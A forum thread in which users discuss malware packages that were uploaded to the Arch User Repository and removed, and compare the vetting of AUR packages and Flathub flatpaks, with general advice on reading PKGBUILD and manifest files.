All are gone
there are some more packages posted that are clearly malware.
Submitter: Quobleggo, account created today, with 4 packages, popularity 1 to 10.
Yeah it seems that the AUR needs to step up their security Checks on those, the fact that malware can get away like this is crazy.
This is exactly why I check the arch repository first things first before very much resorting to the official website and then AUR
This is a good 'in the wild’ example of why the AUR should be used cautiously and as a last resort. And why it is considered important to vet and understand pkgbuild files yourself before using the AUR, and to understand packages from the AUR are unofficial and unvetted.
Which security checks? AUR packages are unofficial and don’t get thoroughly vetted.
And this is why people shouldn’t download from the AUR, at least not without auditing and verifying every single package they’ve installed.
Wow thanks for sharing this info, this was a surprise to me I had no idea installing software this way was such a security hole, imagine mistyping a package name and you get straight up malware. SecureBlue and flatpaks on my devices seems like the way to go.
Verified / Official Flatpaks. Flatpaks from flathub are a mix of verified flatpaks (meaning they have been confirmed to come directly from the software developer, or a representative that the software developer names).
Unofficial flatpaks (e.g. the Signal Flatpak, Proton Flatpaks, and many others) are somewhat lightly vetted when they are added, but aren’t “official”, or endorsed by flathub. IIRC by default secureblue only enables the verified repository, but I’m not 100% certain about that.
Flatpaks like AUR packages can be individually vetted by you or someone you trust, for AUR packages you’d read the pkgbuild file, for flatpaks you’d read the manifest file. If you’d rather not do that, its best to stick to offical repositories, and verified flatpaks.
Thanks for all of this info.
This is true about SecureBlue, actually the first thing I do when I install it is add back the Flathub repo because unfortunately many of the apps I use come from there like Proton apps, though I try to keep as much security as possible and only enable what I need in the OS. I haven’t been verifying any manifest files but I do know some of the apps I use are unofficial. I don’t know enough about it but I speculate it is harder for someone to for example do the same kind of attack on Flathub by making a similar looking copy of an existing application?
For simpler manifests, it isn’t too complicated (for the rest, its still over my head)
I’d suggest checking out the Signal manifest (regardless of whether you use Signal desktop or not). Relatively speaking it’s quite simple, and easy to understand for non-experts, so its a good learning tool, to gain a little confidence reading manifest files, and at least understand the different sections, and some potential basic red and yellow flags. I don’t consider myself competent in assessing manifests (far from it) but being able to give a flatpak a quick once over, gives some peace of mind.
Coincidentally, just a few days ago, I recently stumbled upon a personal blog post written by an unnamed fellow PG forum member on the this topic that is worth a quick read. Its a bit outdated now, but I think they do a good job breaking it down.
don’t know enough about it but I speculate it is harder for someone to for example do the same kind of attack on Flathub by making a similar looking copy of an existing application?
For that specific attack I think you are possibly/probably right. But other risks exist in that same general category of risks (unofficial packages published by someone other than the developer, and not rigorously vetted by the software repo/distributors) which I think unofficial flatpaks would be similarly vulnerable to.
I have a vague impression that it’d be harder to get malicious software into flathub than into the aur, but that is setting the bar pretty low, and it is just my impression, not based on concrete evidence I could cite.
Can anyone help me find the pkgbuild or the dropper script? I’d like to see/analize how it works.